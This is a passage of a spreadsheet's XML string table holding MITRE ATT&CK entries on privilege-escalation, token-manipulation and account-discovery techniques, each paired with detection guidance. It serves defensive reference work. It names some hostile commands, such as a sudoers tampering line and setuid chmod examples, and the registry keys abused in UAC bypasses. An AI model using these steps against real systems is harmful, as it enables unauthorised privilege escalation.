  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0225</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0123</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0248</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0350</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>detection</t>
  </si>
  <si>
    <t>data sources</t>
  </si>
  <si>
    <t>is sub-technique</t>
  </si>
  <si>
    <t>sub-technique of</t>
  </si>
  <si>
    <t>permissions required</t>
  </si>
  <si>
    <t>defenses bypassed</t>
  </si>
  <si>
    <t>supports remote</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>30 January 2020</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.
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Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Bypass User Account Control</t>
  </si>
  <si>
    <t>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 (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Casey Smith; Stefan Kanthak</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Setuid and Setgid</t>
  </si>
  <si>
    <t>An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt; (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134</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</si>
  <si>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There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>File system access controls, Heuristic Detection, Host forensic analysis, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and use it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>18 February 2020</t>
  </si>
  <si>
    <t>26 March 2020</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Access Token Manipulation: Make and Impersonate Token</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/003</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</si>
  <si>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If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Access Token Manipulation: Parent PID Spoofing</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Heuristic Detection, Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>Access Token Manipulation: SID-History Injection</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Vincent Le Toux</t>
  </si>
  <si>
    <t>Administrator, SYSTEM</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Access Token Manipulation: Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>09 October 2019</t>
  </si>
  <si>
    <t>14 July 2020</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>Discovery</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</si>
  <si>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Monitor for processes that can be used to enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; Microsoft Threat Intelligence Center (MSTIC); Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Account Discovery: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>21 February 2020</t>
  </si>
  <si>
    <t>16 March 2021</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Praetorian</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Account Discovery: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Account Discovery: Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>31 March 2021</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</si>
  <si>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</si>
  <si>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Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Account Discovery: Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
